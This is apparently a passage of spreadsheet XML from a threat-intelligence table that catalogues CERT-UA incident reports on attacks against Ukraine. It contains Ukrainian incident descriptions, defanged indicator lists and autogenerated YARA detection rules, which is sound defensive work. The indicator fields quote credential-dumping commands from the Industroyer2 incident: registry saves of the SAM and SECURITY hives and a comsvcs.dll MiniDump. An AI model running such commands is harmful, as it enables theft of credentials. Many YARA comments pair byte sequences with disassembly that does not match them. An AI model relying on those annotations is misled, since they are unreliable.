        $sequence_2 = { 7411 40 50 6a08 ff15???????? }
            // n = 5, score = 1300
            //   7411                 | je                  0x13
            //   40                   | inc                 eax
            //   50                   | push                eax
            //   6a08                 | push                8
            //   ff15????????         |                     
        $sequence_3 = { ff15???????? 85c0 7420 837c241000 7419 }
            // n = 5, score = 1300
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7420                 | je                  0x22
            //   837c241000           | cmp                 dword ptr [esp + 0x10], 0
            //   7419                 | je                  0x1b
        $sequence_4 = { 50 6801000080 ff15???????? eb13 }
            // n = 4, score = 1300
            //   50                   | push                eax
            //   6801000080           | push                0x80000001
            //   ff15????????         |                     
            //   eb13                 | jmp                 0x15
        $sequence_5 = { f7d0 d1c8 2d20010000 d1c0 f7d0 2d01910000 }
            // n = 6, score = 1300
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax
            //   2d01910000           | sub                 eax, 0x9101
        $sequence_6 = { be01000080 50 56 ff15???????? }
            // n = 4, score = 1300
            //   be01000080           | mov                 esi, 0x80000001
            //   50                   | push                eax
            //   56                   | push                esi
            //   ff15????????         |                     
        $sequence_7 = { eb0f 6a08 ff15???????? 50 ff15???????? 8906 }
            // n = 6, score = 1300
            //   eb0f                 | jmp                 0x11
            //   6a08                 | push                8
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8906                 | mov                 dword ptr [esi], eax
        $sequence_8 = { 7511 56 57 ff15???????? 50 }
            // n = 5, score = 1300
            //   7511                 | jne                 0x13
            //   56                   | push                esi
            //   57                   | push                edi
            //   ff15????????         |                     
            //   50                   | push                eax
        $sequence_9 = { c1c90d 0fbec0 03c8 46 8a06 84c0 75f1 }
            // n = 7, score = 1200
            //   c1c90d               | ror                 ecx, 0xd
            //   0fbec0               | movsx               eax, al
            //   03c8                 | add                 ecx, eax
            //   46                   | inc                 esi
            //   8a06                 | mov                 al, byte ptr [esi]
            //   84c0                 | test                al, al
            //   75f1                 | jne                 0xfffffff3
        $sequence_10 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 6, score = 1000
            //   e8????????           |                     
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, dword ptr [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5
        $sequence_11 = { 8be5 5d c3 8b542404 33c9 }
            // n = 5, score = 1000
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp
            //   c3                   | ret                 
            //   8b542404             | mov                 edx, dword ptr [esp + 4]
            //   33c9                 | xor                 ecx, ecx
        $sequence_12 = { 8d4508 50 0fb6440b34 50 }
            // n = 4, score = 800
            //   8d4508               | lea                 eax, dword ptr [ebp + 8]
            //   50                   | push                eax
            //   0fb6440b34           | movzx               eax, byte ptr [ebx + ecx + 0x34]
            //   50                   | push                eax
        $sequence_13 = { 51 51 8b4c240c 53 55 }
            // n = 5, score = 800
            //   51                   | push                ecx
            //   51                   | push                ecx
            //   8b4c240c             | mov                 ecx, dword ptr [esp + 0xc]
            //   53                   | push                ebx
            //   55                   | push                ebp
        $sequence_14 = { 89542414 8b12 85d2 7454 }
            // n = 4, score = 800
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx
            //   7454                 | je                  0x56
        $sequence_15 = { eb5c 8d5004 89542414 8b12 }
            // n = 4, score = 800
            //   eb5c                 | jmp                 0x5e
            //   8d5004               | lea                 edx, dword ptr [eax + 4]
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
        $sequence_16 = { 8a4173 a808 75f5 a804 7406 }
            // n = 5, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4
            //   7406                 | je                  8
        $sequence_17 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001
            //   e9????????           |                     
        $sequence_18 = { ff5010 85c0 7407 33c0 }
            // n = 4, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax
        $sequence_19 = { 44 8d4904 ff15???????? 33ff }
            // n = 4, score = 300
            //   44                   | inc                 esp
            //   8d4904               | lea                 ecx, dword ptr [ecx + 4]
            //   ff15????????         |                     
            //   33ff                 | xor                 edi, edi
        $sequence_20 = { c7854005000047657450 c78544050000726f6365 c7854805000073734865 66c7854c0500006170 }
            // n = 4, score = 300
            //   c7854005000047657450     | test    eax, eax
            //   c78544050000726f6365     | je    0x14
            //   c7854805000073734865     | mov    eax, dword ptr [ebp + 0x50]
            //   66c7854c0500006170     | test    eax, eax
        $sequence_21 = { 85c0 7412 8b4550 85c0 740b }
            // n = 5, score = 300
            //   85c0                 | not                 eax
            //   7412                 | ror                 eax, 1
            //   8b4550               | sub                 eax, 0x120
            //   85c0                 | rol                 eax, 1
            //   740b                 | not                 eax
        $sequence_22 = { ff15???????? 85c0 7473 8b4550 }
            // n = 4, score = 300
            //   ff15????????         |                     
            //   85c0                 | je                  0x13
            //   7473                 | inc                 eax
            //   8b4550               | push                eax
        $sequence_23 = { c7853401000050726f63 c7853801000065737300 c785300300006b65726e c78534030000656c3332 }
            // n = 4, score = 300
            //   c7853401000050726f63     | push    8
            //   c7853801000065737300     | push    0
            //   c785300300006b65726e     | xor    eax, eax
            //   c78534030000656c3332     | inc    eax
        $sequence_24 = { c7859001000056697274 c7859401000075616c46 c7859801000072656500 c785b00400006b65726e }
            // n = 4, score = 300
            //   c7859001000056697274     | not    eax
            //   c7859401000075616c46     | ror    eax, 1
            //   c7859801000072656500     | sub    eax, 0x120
            //   c785b00400006b65726e     | rol    eax, 1
        $sequence_25 = { 0f94c7 8bc7 eb02 33c0 48 }
            // n = 5, score = 300
            //   0f94c7               | sete                bh
            //   8bc7                 | mov                 eax, edi
            //   eb02                 | jmp                 4
            //   33c0                 | xor                 eax, eax
            //   48                   | dec                 eax
        $sequence_26 = { c785a807000053747243 c785ac07000068724100 c7858001000053686c77 c785840100006170692e c78588010000646c6c00 e8???????? }
            // n = 6, score = 300
            //   c785a807000053747243     | je    0x14
            //   c785ac07000068724100     | mov    dword ptr [ebp + 0x190], 0x74726956
            //   c7858001000053686c77     | mov    dword ptr [ebp + 0x194], 0x466c6175
            //   c785840100006170692e     | mov    dword ptr [ebp + 0x198], 0x656572
            //   c78588010000646c6c00     | mov    dword ptr [ebp + 0x4b0], 0x6e72656b
            //   e8????????           |                     
        $sequence_27 = { 7414 ff15???????? 4c 8bc3 33d2 48 8bc8 }
            // n = 7, score = 300
            //   7414                 | je                  0x16
            //   ff15????????         |                     
            //   4c                   | dec                 esp
            //   8bc3                 | mov                 eax, ebx
            //   33d2                 | xor                 edx, edx
            //   48                   | dec                 eax
            //   8bc8                 | mov                 ecx, eax
        $sequence_28 = { 48 85ff 7414 ff15???????? 4c 8bc7 33d2 }
            // n = 7, score = 300
            //   48                   | dec                 eax
            //   85ff                 | test                edi, edi
            //   7414                 | je                  0x16
            //   ff15????????         |                     
            //   4c                   | dec                 esp
            //   8bc7                 | mov                 eax, edi
            //   33d2                 | xor                 edx, edx
        $sequence_29 = { c785e404000070656e4b c785e804000065794578 66c785ec0400004100 c785900400006b65726e c78594040000656c3332 }
            // n = 5, score = 300
            //   c785e404000070656e4b     | push    eax
            //   c785e804000065794578     | mov    esi, edi
            //   66c785ec0400004100     | mov    eax, esi
            //   c785900400006b65726e     | jmp    8
            //   c78594040000656c3332     | test    eax, eax
        $sequence_30 = { c785e805000065727300 c785f000000057696e68 c785f40000007474702e c785f8000000646c6c00 e8???????? 660f6f05???????? }
            // n = 6, score = 300
            //   c785e805000065727300     | jne    0x13
            //   c785f000000057696e68     | push    esi
            //   c785f40000007474702e     | push    edi
            //   c785f8000000646c6c00     | test    eax, eax
            //   e8????????           |                     
            //   660f6f05????????     |                     
        $sequence_31 = { 33c0 4c 8d9c24a0000000 49 8b5b20 49 }
            // n = 6, score = 300
            //   33c0                 | xor                 eax, eax
            //   4c                   | dec                 esp
            //   8d9c24a0000000       | lea                 ebx, dword ptr [esp + 0xa0]
            //   49                   | dec                 ecx
            //   8b5b20               | mov                 ebx, dword ptr [ebx + 0x20]
            //   49                   | dec                 ecx
        $sequence_32 = { 837a1000 488bf1 0f8499000000 8b5a10 4803d9 837b0c00 0f8489000000 }
            // n = 7, score = 100
            //   837a1000             | xor                 eax, eax
            //   488bf1               | cmp                 dword ptr [edx + 0x10], 0
            //   0f8499000000         | dec                 eax
            //   8b5a10               | mov                 esi, ecx
            //   4803d9               | je                  0x9f
            //   837b0c00             | mov                 ebx, dword ptr [edx + 0x10]
            //   0f8489000000         | dec                 eax
        $sequence_33 = { 33d2 488bc8 ff15???????? 488bb590020000 4885f6 7414 }
            // n = 6, score = 100
            //   33d2                 | dec                 eax
            //   488bc8               | lea                 edx, dword ptr [ebp + 0x290]
            //   ff15????????         |                     
            //   488bb590020000       | dec                 eax
            //   4885f6               | lea                 ecx, dword ptr [ebp + 0x56]
            //   7414                 | test                eax, eax
        $sequence_34 = { 4c8b742420 eba1 488bb590020000 488b7c2438 }
            // n = 4, score = 100
            //   4c8b742420           | jne                 0xd
            //   eba1                 | xor                 edx, edx
            //   488bb590020000       | dec                 eax
            //   488b7c2438           | mov                 ecx, eax
        $sequence_35 = { 4883c314 e9???????? ff15???????? 33c0 }
            // n = 4, score = 100
            //   4883c314             | dec                 eax
            //   e9????????           |                     
            //   ff15????????         |                     
            //   33c0                 | add                 ebx, 0x14
        $sequence_36 = { ff15???????? 80bb8000000040 0f8577ffffff 488d8b81000000 488d542450 e8???????? }
            // n = 6, score = 100
            //   ff15????????         |                     
            //   80bb8000000040       | jmp                 0xffffffa8
            //   0f8577ffffff         | dec                 eax
            //   488d8b81000000       | mov                 esi, dword ptr [ebp + 0x290]
            //   488d542450           | dec                 eax
            //   e8????????           |                     
        $sequence_37 = { 4c8d8598020000 488d9590020000 488d4d56 e8???????? 85c0 750b ff15???????? }
            // n = 7, score = 100
            //   4c8d8598020000       | add                 ebx, ecx
            //   488d9590020000       | cmp                 dword ptr [ebx + 0xc], 0
            //   488d4d56             | je                  0x8f
            //   e8????????           |                     
            //   85c0                 | dec                 esp
            //   750b                 | lea                 eax, dword ptr [ebp + 0x298]
            //   ff15????????         |                     
        $sequence_38 = { 8364242000 4533c9 33d2 33c9 ff15???????? eb0b }
            // n = 6, score = 100
            //   8364242000           | jmp                 0xffffffa3
            //   4533c9               | dec                 eax
            //   33d2                 | mov                 esi, dword ptr [ebp + 0x290]
            //   33c9                 | dec                 eax
            //   ff15????????         |                     
            //   eb0b                 | mov                 edi, dword ptr [esp + 0x38]
        $sequence_39 = { ff15???????? 488d5702 488bce ff15???????? ba22000000 }
            // n = 5, score = 100
            //   ff15????????         |                     
            //   488d5702             | mov                 edi, dword ptr [esp + 0x38]
            //   488bce               | dec                 esp
            //   ff15????????         |                     
            //   ba22000000           | mov                 esi, dword ptr [esp + 0x20]
    condition:
        7 of them and filesize &lt; 303104
}</t>
  </si>
  <si>
    <t>Виявлено факт масового розповсюдження серед громадян України XLS-документів з назвою "Мобілізаційний реєстр.xls".
З'ясовано, що у разі відкриття документу та активації макросу, останній забезпечить завантаження і запуск виконуваного файлу. Завантажений EXE-файл забезпечить дешифрування та запуск на комп'ютері шкідливої програми GzipLoader, яка, в свою чергу, здійснить завантаження, дешифрування та запуск шкідливої програми IcedID. Згадана шкідлива програма (також відома як BankBot) відноситься до класу "банківських троянських програм", та, серед іншого, забезпечує викрадення автентифікаційних даних.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39609</t>
  </si>
  <si>
    <t>CERT-UA#4461</t>
  </si>
  <si>
    <t>UAC-0097;Unknown</t>
  </si>
  <si>
    <t>Президент України, Військові, Герої України; en</t>
  </si>
  <si>
    <t>XSS (Cross-Site Scripting), Zimbra Collaboration Suite, Content-Location header in an email attachment</t>
  </si>
  <si>
    <t>js</t>
  </si>
  <si>
    <t>Vulnerability,Unauthorised access to information</t>
  </si>
  <si>
    <t>"09.01", "07.01"</t>
  </si>
  <si>
    <t>Stolen personal data</t>
  </si>
  <si>
    <t>joey@kmtacn[.]com (X-FE-Envelope-From)
211.234.110[.]194 (X-FE-Last-Public-Client-IP)
hxxps://cdn.jsdelivr[.]net/gh/sukaut/beta@main/junit.js
repo.ma@hotmail[.]com (адреса електронної пошти для ексфільтрації)
nov.td@yandex[.]ru (пов'язана адреса електронної пошти)
hxxps://github[.]com/sukaut (відповідний репозиторій в GitHub)</t>
  </si>
  <si>
    <t>Від суб'єкту координації отримано електронний лист з темою "Volodymyr Zelenskyy presented the Golden Star Orders to servicemen of the Armed Forces of Ukraine and members of the families of the fallen Heroes of Ukraine" та декількома графічними зображеннями.
За результатами дослідження з'ясовано, що заголовок листа "Content-Location" містить JavaScript-код, виконання якого призведе до завантаження і виконання іншого JavaScript-коду, призначенням якого є додавання до конфігурації облікового запису електронної пошти жертви сторонньої електронної адреси з метою подальшого пересилання на неї електронних листів користувача.
Технічна можливість реалізації описаної загрози класифікована за ідентифікатором CVE-2018-6882 як XSS (Cross-Site Scripting) вразливість в Zimbra Collaboration Suite (&lt; 8.7 Patch 1, 8.8.x &lt; 8.8.7).</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39606</t>
  </si>
  <si>
    <t>CVE-2018-6882</t>
  </si>
  <si>
    <t>CWE-79</t>
  </si>
  <si>
    <t>4,3</t>
  </si>
  <si>
    <t>CERT-UA#4435</t>
  </si>
  <si>
    <t>Sandworm (UAC-0082);Russia APT</t>
  </si>
  <si>
    <t>energy facilities of Ukraine</t>
  </si>
  <si>
    <t>Перемога, Зрада; ua</t>
  </si>
  <si>
    <t>PowerShell, POWERGAP, IMPACKET, INDUSTROYER2, CADDYWIPER, ARGUEPATCH, TAILJUMP, ORCSHRED, SOLOSHRED, AWFULSHRED</t>
  </si>
  <si>
    <t>sh, exe, pay, bin</t>
  </si>
  <si>
    <t>Malware infection, Sabotage</t>
  </si>
  <si>
    <t>"02.01", "06.02"</t>
  </si>
  <si>
    <t>System failure, de-energization of the territory</t>
  </si>
  <si>
    <t>91.245.255[.]243
195.230.23[.]19</t>
  </si>
  <si>
    <t>C:\Users\peremoga.exe JRIBDFIMCQAKVBBP C:\Users\pa1.pay
reg save HKLM\SYSTEM C:\Users\Public\sys.reg /y
reg save HKLM\SECURITY C:\Users\Public\sec.reg /y
reg save HKLM\SAM C:\Users\Public\sam.reg /y
\\%DOMAIN%\sysvol\%DOMAIN%\Policies\%GPO ID%\Machine\zrada.exe
\\%DOMAIN%\sysvol\%DOMAIN%\Policies\%GPO ID%\Machine\pa.pay
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll MiniDump %PID% C:\Users\Public\mem.dmp full
C:\Windows\Temp\link.ps1
C:\Users\peremoga.exe
C:\Users\pa1.pay
C:\Dell\vatt.exe
C:\Dell\pa.pay
C:\Dell\108_100.exe
C:\tmp\cdel.exe</t>
  </si>
  <si>
    <t>передано обмеженому колу міжнародних партнерів та підприємствам енергетичного сектору України</t>
  </si>
  <si>
    <t>Вжито невідкладних заходів з реагування на інцидент інформаційної безпеки, пов’язаний з цільовою атакою на об’єкт енергетики України.
Задум зловмисників передбачав виведення з ладу декількох інфраструктурних елементів об’єкту атаки, а саме:
* високовольтних електричних підстанцій
електронних 
* обчислювальних машин (ЕОМ) під управлінням операційної системи Windows 
* серверного обладнання під управлінням операційної систем Linux
* активного мережевого обладнання</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39518</t>
  </si>
  <si>
    <t>Prevented</t>
  </si>
  <si>
    <t>CERT-UA#4434</t>
  </si>
  <si>
    <t>Armageddon (UAC-0010);Russia APT</t>
  </si>
  <si>
    <t>Прокуратура, росія, Військові, Вбивство, Тимчасово окуповані території; ua</t>
  </si>
  <si>
    <t>lnk shortcut, NO-IP</t>
  </si>
  <si>
    <t>htm, rar, lnk</t>
  </si>
  <si>
    <t>Malware distribution</t>
  </si>
  <si>
    <t>"02.02"</t>
  </si>
  <si>
    <t>Payload execution</t>
  </si>
  <si>
    <t xml:space="preserve">military-prosecutor@post.cz
hXXp://m-vz.webhop[.]me/prk/faicon.ico
hXXp://a0656203.xsph[.]ru/prescription/seized.xml
hXXp://a0656203.xsph[.]ru/prepared/semi.xml
m-vz.webhop[.]me
a0656203.xsph[.]ru
a0322810.xsph[.]ru
webhop[.]me
xsph[.]ru
lnk-upload.dodortar[.]ru
dod-upload.dodortar[.]ru
ln-upl.ddns[.]net
d-upl.ddns[.]net
up-dot.myftp[.]org
up-lnk.myftp[.]org
nitikora[.]ru
dodortar[.]ru
kopratiso[.]ru
billyhot[.]ru
bilitora[.]ru
194[.]58.121.198
194[.]180.174.105
149[.]248.13.58
</t>
  </si>
  <si>
    <t>Від суб'єкту координації отримано електронний лист з темою "№1275 від 07.04.2022", що містить одноіменний HTML-файл, відриття якого призведе до створення на комп'ютері архіву "1275_07.04.2022.rar". Останній містить LNK-файл "Щодо фактів переслідування та вбивства працівників Прокуратури з боку російських військових на тимчасово окупованих територіях.lnk", відкриття якого призведе до завантаження і запуску пейлоаду.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39386</t>
  </si>
  <si>
    <t>CERT-UA#4360</t>
  </si>
  <si>
    <t>UAC-0094;Unknown</t>
  </si>
  <si>
    <t>Telegram users accounts</t>
  </si>
  <si>
    <t>Несанкціонований вхід; en</t>
  </si>
  <si>
    <t>Malicious link via SMS, Telegram</t>
  </si>
  <si>
    <t>Phishing,Unauthorised access to information</t>
  </si>
  <si>
    <t>"03.03", "07.01"</t>
  </si>
  <si>
    <t>hxxps://telegram.org.security[.]ohsxy.com/?access=true&amp;check=
security-check.telegram.org.ohsxy[.]com
telegram.org.security.ohsxy[.]com
ohsxy[.]com
telsec[.]org
45[.]150.67.87
193[.]106.191.202</t>
  </si>
  <si>
    <t>Вжито заходів з дослідження цільових атак, спрямованих на громадян України, що полягають у розповсюдженні повідомлень з посиланнями на, начебто, веб-сайт Telegram з метою отримання несанкціонованого доступу до облікових записів згаданого сервісу, в тому числі, з можливістю перехоплення одноразового SMS-коду.
В результаті подібних атак зловмисниками здійснюється викрадення даних сесії, переліку контактів та історії листування.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39253</t>
  </si>
  <si>
    <t>Handled</t>
  </si>
  <si>
    <t>CERT-UA#4378</t>
  </si>
  <si>
    <t>Військові, Злочин, росія; ua</t>
  </si>
  <si>
    <t>NTA-file, VBScript, PowerShell, HTTP POST, GammaLoad</t>
  </si>
  <si>
    <t>eml, lnk, htm, rar</t>
  </si>
  <si>
    <t>Malware distribution, Phishing,Unauthorised access to information</t>
  </si>
  <si>
    <t>Stolen personal data, Payload execution</t>
  </si>
  <si>
    <t>vadim_melnik88@i[.]ua (envelope-from)
194[.]38.21.12 (X-Sender-IP)
hxxp://jokotras[.]ru/su/faicon.ico
hxxp://prefer[.]jokotras.ru/hear/nephew/su
hxxp://tiloraso[.]ru/get.php
hxxp://tiloraso[.]ru/index.php
jokotras[.]ru
tiloraso[.]ru
milotrad[.]ru
potrakit[.]ru
tortunas[.]ru
66[.]175.219.231 (@linode.com)</t>
  </si>
  <si>
    <t>C:\Users\Public\test.vbs
%TMP%\&lt;rand_digits&gt;.exe</t>
  </si>
  <si>
    <t>Виялено факт розповсюдження електронних листів з темою "Інформація щодо військових злочинців РФ" серед державних органів України. Електронний лист містить HTML-файл "Військові злочинці РФ.htm", відкриття якого призведе до створення на комп'ютері RAR-архіву "Viyskovi_zlochinci_RU.rar". Згаданий архів містить файл-ярлик "Військові-злочинці що знищують Україну (домашні адреси, фото, номера телефонів, сторінки у соціальних сетях).lnk", відкриття якого призведе до завантаження HTA-файлу, який містить VBScript-код, що, у свою чергу, забезпечить завантаження і запуск powershell-скрипта "get.php" (GammaLoad.PS1). Завданням останнього є визначення унікального ідентифікатору комп'ютера (на основі імені комп'ютера та серійного номеру системного диску), передача цієї інформації для використання як XOR-ключа на сервер управління за допомогою HTTP POST-запиту, а також завантаження, XOR-декодування та запуск пейлоаду.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/39138</t>
  </si>
  <si>
    <t>CERT-UA#4315</t>
  </si>
  <si>
    <t>UAC-0041;Russia APT</t>
  </si>
  <si>
    <t>Школа, Програма; ua</t>
  </si>
  <si>
    <t>MarsStealer</t>
  </si>
  <si>
    <t>rar, exe, zip</t>
  </si>
  <si>
    <t>Stolen personal data, RCE, Screenshot</t>
  </si>
  <si>
    <t>hXXps://drive.google[.]com/uc?export=download&amp;confirm=no_antivirus&amp;id=1XuVgWWXE8yeYKp6s1MnSA5M8wAx0AJih
hXXps://api.dev-com[.]sc/files_1/v_5.1.9.exe
hXXps://api.dev-com[.]sc/files_1/v_5.1.9.zip
hXXp://176[.]57.189.191/gate[.]php
hXXp://176[.]57.189.191/mozglue[.]dll
hXXp://176[.]57.189.191/vcruntime140[.]dll
hXXp://176[.]57.189.191/nss3[.]dll
hXXp://176[.]57.189.191/msvcp140[.]dll
hXXp://176[.]57.189.191/freebl3[.]dll
hXXp://176[.]57.189.191/sqlite3[.]dll
hXXp://176[.]57.189.191/softokn3[.]dll
api.dev-com[.]sc
dev-com[.]sc (2022-03-24)
176[.]57.189.191
95[.]111.231.126</t>
  </si>
  <si>
    <t>C:\ProgramData\sqlite3.dll
C:\ProgramData\freebl3.dll
C:\ProgramData\mozglue.dll
C:\ProgramData\msvcp140.dll
C:\ProgramData\nss3.dll
C:\ProgramData\softokn3.dll
C:\ProgramData\vcruntime140.dll</t>
  </si>
  <si>
    <t>rule win_mars_stealer_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.mars_stealer."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer"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51 ff15???????? 83c40c 6a00 6800004006 6a00 e8???????? }
            // n = 7, score = 100
            //   51                   | push                ecx
            //   ff15????????         |                     
            //   83c40c               | add                 esp, 0xc
            //   6a00                 | push                0
            //   6800004006           | push                0x6400000
            //   6a00                 | push                0
            //   e8????????           |                     
        $sequence_1 = { 8b450c 0fb70cc5ba664100 8b5508 898a98af0600 8b450c 0fb70cc5b8664100 8b5508 }
            // n = 7, score = 100
            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]
            //   0fb70cc5ba664100     | movzx               ecx, word ptr [eax*8 + 0x4166ba]
            //   8b5508               | mov                 edx, dword ptr [ebp + 8]
            //   898a98af0600         | mov                 dword ptr [edx + 0x6af98], ecx
            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]
            //   0fb70cc5b8664100     | movzx               ecx, word ptr [eax*8 + 0x4166b8]
            //   8b5508               | mov                 edx, dword ptr [ebp + 8]
        $sequence_2 = { 50 8d8ddcfdffff 51 ff15???????? 85c0 0f85e1000000 8d95a0fbffff }
            // n = 7, score = 100
            //   50                   | push                eax
            //   8d8ddcfdffff         | lea                 ecx, dword ptr [ebp - 0x224]
            //   51                   | push                ecx
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   0f85e1000000         | jne                 0xe7
            //   8d95a0fbffff         | lea                 edx, dword ptr [ebp - 0x460]
        $sequence_3 = { 83c40c 50 8d8de8feffff 51 }
            // n = 4, score = 100
            //   83c40c               | add                 esp, 0xc
            //   50                   | push                eax
            //   8d8de8feffff         | lea                 ecx, dword ptr [ebp - 0x118]
            //   51                   | push                ecx
        $sequence_4 = { 8b55f4 52 8b45fc 50 8d8de0fdffff }
            // n = 5, score = 100
            //   8b55f4               | mov                 edx, dword ptr [ebp - 0xc]
            //   52                   | push                edx
            //   8b45fc               | mov                 eax, dword ptr [ebp - 4]
            //   50                   | push                eax
            //   8d8de0fdffff         | lea                 ecx, dword ptr [ebp - 0x220]
        $sequence_5 = { 837df820 0f8d61030000 6804010000 8d8de8feffff 51 }
            // n = 5, score = 100
            //   837df820             | cmp                 dword ptr [ebp - 8], 0x20
            //   0f8d61030000         | jge                 0x367
            //   6804010000           | push                0x104
            //   8d8de8feffff         | lea                 ecx, dword ptr [ebp - 0x118]
            //   51                   | push                ecx
        $sequence_6 = { 51 68???????? e8???????? 83c418 8d55fc 52 8d45f8 }
            // n = 7, score = 100
            //   51                   | push                ecx
            //   68????????           |                     
            //   e8????????           |                     
            //   83c418               | add                 esp, 0x18
            //   8d55fc               | lea                 edx, dword ptr [ebp - 4]
            //   52                   | push                edx
            //   8d45f8               | lea                 eax, dword ptr [ebp - 8]
        $sequence_7 = { ff15???????? 50 e8???????? 83c404 50 8b55fc }
            // n = 6, score = 100
            //   ff15????????         |                     
            //   50                   | push                eax
            //   e8????????           |                     
            //   83c404               | add                 esp, 4
            //   50                   | push                eax
            //   8b55fc               | mov                 edx, dword ptr [ebp - 4]
        $sequence_8 = { 8d8d78ecffff 51 e8???????? 8d95e4d7ffff 52 8d85e0d7ffff 50 }
            // n = 7, score = 100
            //   8d8d78ecffff         | lea                 ecx, dword ptr [ebp - 0x1388]
            //   51                   | push                ecx
            //   e8????????           |                     
            //   8d95e4d7ffff         | lea                 edx, dword ptr [ebp - 0x281c]
            //   52                   | push                edx
            //   8d85e0d7ffff         | lea                 eax, dword ptr [ebp - 0x2820]
            //   50                   | push                eax
        $sequence_9 = { 83c201 8955f8 8b45f4 8b0c85f0654100 83e907 }
            // n = 5, score = 100
            //   83c201               | add                 edx, 1
            //   8955f8               | mov                 dword ptr [ebp - 8], edx
            //   8b45f4               | mov                 eax, dword ptr [ebp - 0xc]
            //   8b0c85f0654100       | mov                 ecx, dword ptr [eax*4 + 0x4165f0]
            //   83e907               | sub                 ecx, 7
    condition:
        7 of them and filesize &lt; 219136
}</t>
  </si>
  <si>
    <t>Отримано інформацію щодо масового розповсюдження електронних листів з темою "Нова програма для запису в журналi." серед громадян України та вітчизняних організацій. Текст електронного листа містить повідомлення, начебто, від Міністерства освіти та науки України щодо "електронних навчальних журналів", а також посилання на "програму" та пароль на архів.
У разі відкриття архіву та запуску EXE-файлу, комп'ютер буде уражено шкідливою програмою, яку, за сукупністю ознак (незважачи на деякі відмінності), класифіковано як MarsStealer.
MarsStelaer - шкідлива програма-стілер, розроблена з використанням мов програмування C/ASM. Основний функціонал - збір інформації про комп'ютер, викрадення аутентифікаційних даних з Інтернет-браузерів, плагінів крипто-гаманців, програм багатофакторної аутентифікації, викрадення файлів, а також завантаження і запуск виконуваних файлів і виготовлення знімку екрану.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/38606</t>
  </si>
  <si>
    <t>CERT-UA#4293</t>
  </si>
  <si>
    <t>Заборгованість, Зарплата; ua</t>
  </si>
  <si>
    <t>hxxp://194[.]31.98.124:443/i
hxxp://194[.]31.98.124:443/p
hxxp://194[.]31.98.124:443/m
ws://194[.]31.98.124:443/c
194[.]31.98.124</t>
  </si>
  <si>
    <t>%TMP%\Base-Update.exe
%USERPROFILE%\.java-sdk\java-sdk.exe
%USERPROFILE%\.java-sdk\oracle-java.exe
%USERPROFILE%\.java-sdk\microsoft-cortana.exe</t>
  </si>
  <si>
    <t>rule win_graphsteel_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.graphsteel."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel"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8b8c2484000000 8d42ff 85c9 0f49c1 498b4d00 80796100 4189c3 }
            // n = 7, score = 100
            //   8b8c2484000000       | pop                 edi
            //   8d42ff               | pop                 ebp
            //   85c9                 | ja                  0xca
            //   0f49c1               | dec                 eax
            //   498b4d00             | mov                 esi, 0x3e01
            //   80796100             | add                 eax, 0x48000003
            //   4189c3               | bt                  esi, edx
        $sequence_1 = { ff15???????? 48c7434000000000 ff15???????? 4c8b4b30 b90a180000 c74424202ab30000 894320 }
            // n = 7, score = 100
            //   ff15????????         |                     
            //   48c7434000000000     | lea                 eax, dword ptr [0x3cc23b]
            //   ff15????????         |                     
            //   4c8b4b30             | dec                 eax
            //   b90a180000           | mov                 ebp, dword ptr [esp + 0xb8]
            //   c74424202ab30000     | dec                 eax
            //   894320               | add                 esp, 0xc0
        $sequence_2 = { eb0e 488d7848 488b4c2418 e8???????? 4889c3 488d05eebd4f00 488b6c2420 }
            // n = 7, score = 100
            //   eb0e                 | dec                 ecx
            //   488d7848             | mov                 ecx, dword ptr [edi + 0x50]
            //   488b4c2418           | mov                 eax, 2
            //   e8????????           |                     
            //   4889c3               | xor                 ebx, ebx
            //   488d05eebd4f00       | mov                 dword ptr [esp + 0x124], 0
            //   488b6c2420           | mov                 dword ptr [esp + 0xa0], 0
        $sequence_3 = { 8b430c 39f8 0f8fc5000000 c7430cffffffff 85ff 0f8efc000000 0f1f440000 }
            // n = 7, score = 100
            //   8b430c               | mov                 ecx, dword ptr [ebx + 0x10]
            //   39f8                 | dec                 eax
            //   0f8fc5000000         | mov                 ecx, dword ptr [ebx]
